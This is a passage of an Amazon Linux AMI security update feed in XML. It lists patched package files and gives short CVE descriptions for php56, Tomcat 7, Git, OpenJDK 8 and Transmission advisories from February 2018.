epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.33" release="1.136.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.33-1.136.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.33-1.136.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.33" release="1.136.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.33-1.136.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-947</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-947: low priority package update for tomcat7</title><issued date="2018-02-07 17:13:00" /><updated date="2018-02-08 21:32:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15706:
As part of the fix for bug 61201, the documentation for Apache Tomcat 9.0.0.M22 to 9.0.1, 8.5.16 to 8.5.23, 8.0.45 to 8.0.47 and 7.0.79 to 7.0.82 included an updated description of the search algorithm used by the CGI Servlet to identify which script to execute. The update was not correct. As a result, some scripts may have failed to execute as expected and other scripts may have been executed unexpectedly. Note that the behaviour of the CGI servlet has remained unchanged in this regard. It is only the documentation of the behaviour that was wrong and has been corrected.
1540828:
CVE-2017-15706 tomcat: Incorrect documentation of CGI Servlet search algorithm may lead to misconfiguration
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15706" title="" id="CVE-2017-15706" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-javadoc" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.84-1.31.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.84" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.84-1.31.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-948</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-948: low priority package update for git</title><issued date="2018-02-07 17:34:00" /><updated date="2018-02-08 21:32:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15298:
Git through 2.14.2 mishandles layers of tree objects, which allows remote attackers to cause a denial of service (memory consumption) via a crafted repository, aka a Git bomb. This can also have an impact of disk consumption; however, an affected process typically would not survive its attempt to build the data structure in memory before writing to disk.
1510455:
CVE-2017-15298 git: Mishandling layers of tree objects
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15298" title="" id="CVE-2017-15298" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-daemon" version="2.13.6" release="2.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.13.6-2.56.amzn1.x86_64.rpm</filename></package><package name="git-bzr" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="git" version="2.13.6" release="2.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.13.6-2.56.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.13.6" release="2.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.13.6-2.56.amzn1.x86_64.rpm</filename></package><package name="git-svn" version="2.13.6" release="2.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.13.6-2.56.amzn1.x86_64.rpm</filename></package><package name="git-all" version="2.13.6" release="2.56.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.13.6-2.56.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.13.6" release="2.56.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.13.6-2.56.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.13.6" release="2.56.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.13.6-2.56.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.13.6" release="2.56.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.13.6-2.56.amzn1.i686.rpm</filename></package><package name="git" version="2.13.6" release="2.56.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.13.6-2.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-949</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-949: important priority package update for java-1.8.0-openjdk</title><issued date="2018-02-07 17:45:00" /><updated date="2018-02-08 21:42:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2678:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JNDI). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151; JRockit: R28.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L).
1534263:
CVE-2018-2678 OpenJDK: unbounded memory allocation in BasicAttributes deserialization (JNDI, 8191142)
CVE-2018-2677:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L).
1534288:
CVE-2018-2677 OpenJDK: unbounded memory allocation during deserialization (AWT, 8190289)
CVE-2018-2663:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151; JRockit: R28.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L).
1534296:
CVE-2018-2663 OpenJDK: ArrayBlockingQueue deserialization to an inconsistent state (Libraries, 8189284)
CVE-2018-2641:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u171, 7u161, 8u152 and 9.0.1; Java SE Embedded: 8u151. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 6.1 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N).
1534766:
CVE-2018-2641 OpenJDK: GTK library loading use-after-free (AWT, 8185325)
CVE-2018-2637:
It was discovered that the JMX component of OpenJDK failed to properly set the deserialization filter for the SingleEntryRegistry in certain cases. A remote attacker could possibly use this flaw to bypass intended deserialization restrictions.
1534970:
CVE-2018-2637 OpenJDK: SingleEntryRegistry incorrect setup of deserialization filter (JMX, 8186998)
CVE-2018-2634:
The JGSS component of OpenJDK ignores the value of the javax.security.auth.useSubjectCredsOnly property when using HTTP/SPNEGO authentication and always uses global credentials. It was discovered that this could cause global credentials to be unexpectedly used by an untrusted Java application.
1534943:
CVE-2018-2634 OpenJDK: use of global credentials for HTTP/SPNEGO (JGSS, 8186600)
CVE-2018-2633:
It was discovered that the LDAPCertStore class in the JNDI component of OpenJDK failed to securely handle LDAP referrals. An attacker could possibly use this flaw to make it fetch attacker controlled certificate data.
1535036:
CVE-2018-2633 OpenJDK: LDAPCertStore insecure handling of LDAP referrals (JNDI, 8186606)
CVE-2018-2629:
It was discovered that the JGSS component of OpenJDK failed to properly handle GSS context in the native GSS library wrapper in certain cases. A remote attacker could possibly make a Java application using JGSS to use a previously freed context.
1534625:
CVE-2018-2629 OpenJDK: GSS context use-after-free (JGSS, 8186212)
CVE-2018-2618:
It was discovered that the key agreement implementations in the JCE component of OpenJDK did not guarantee sufficient strength of used keys to adequately protect generated shared secret. This could make it easier to break data encryption by attacking key agreement rather than the encryption using the negotiated secret.
1534762:
CVE-2018-2618 OpenJDK: insufficient strength of key agreement (JCE, 8185292)
CVE-2018-2603:
It was discovered that the Libraries component of OpenJDK failed to sufficiently limit the amount of memory allocated when reading DER encoded input. A remote attacker could possibly use this flaw to make a Java application use an excessive amount of memory if it parsed attacker supplied DER encoded input.
1534553:
CVE-2018-2603 OpenJDK: DerValue unbounded memory allocation (Libraries, 8182387)
CVE-2018-2602:
It was discovered that the I18n component of OpenJDK could use an untrusted search path when loading resource bundle classes. A local attacker could possibly use this flaw to execute arbitrary code as another local user by making their Java application load an attacker controlled class file.
1534525:
CVE-2018-2602 OpenJDK: loading of classes from untrusted locations (I18n, 8182601)
CVE-2018-2599:
It was discovered that the DNS client implementation in the JNDI component of OpenJDK did not use random source ports when sending out DNS queries. This could make it easier for a remote attacker to spoof responses to those queries.
1534543:
CVE-2018-2599 OpenJDK: DnsClient missing source port randomization (JNDI, 8182125)
CVE-2018-2588:
It was discovered that the LDAP component of OpenJDK failed to properly encode special characters in user names when adding them to an LDAP search query. A remote attacker could possibly use this flaw to manipulate LDAP queries performed by the LdapLoginModule class.
1534299:
CVE-2018-2588 OpenJDK: LdapLoginModule insufficient username encoding in LDAP query (LDAP, 8178449)
CVE-2018-2582:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 8u152 and 9.0.1; Java SE Embedded: 8u151. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 6.5 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N).
1534768:
CVE-2018-2582 OpenJDK: insufficient validation of the invokeinterface instruction (Hotspot, 8174962)
CVE-2018-2579:
It was discovered that multiple encryption key classes in the Libraries component of OpenJDK did not properly synchronize access to their internal data. This could possibly cause a multi-threaded Java application to apply weak encryption to data because of the use of a key that was zeroed out.
1534298:
CVE-2018-2579 OpenJDK: unsynchronized access to encryption key data (Libraries, 8172525)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2579" title="" id="CVE-2018-2579" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2582" title="" id="CVE-2018-2582" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2588" title="" id="CVE-2018-2588" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2599" title="" id="CVE-2018-2599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2602" title="" id="CVE-2018-2602" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2603" title="" id="CVE-2018-2603" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2618" title="" id="CVE-2018-2618" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2629" title="" id="CVE-2018-2629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2633" title="" id="CVE-2018-2633" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2634" title="" id="CVE-2018-2634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2637" title="" id="CVE-2018-2637" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2641" title="" id="CVE-2018-2641" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2663" title="" id="CVE-2018-2663" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2677" title="" id="CVE-2018-2677" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2678" title="" id="CVE-2018-2678" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.161-0.b14.36.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.161-0.b14.36.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.161-0.b14.36.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.161-0.b14.36.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.161-0.b14.36.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.161-0.b14.36.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.161-0.b14.36.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.161-0.b14.36.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.161-0.b14.36.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.161-0.b14.36.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.161-0.b14.36.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.161-0.b14.36.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.161-0.b14.36.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.161" release="0.b14.36.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.161-0.b14.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-950</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-950: medium priority package update for transmission</title><issued date="2018-02-07 17:54:00" /><updated date="2018-02-08 21:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
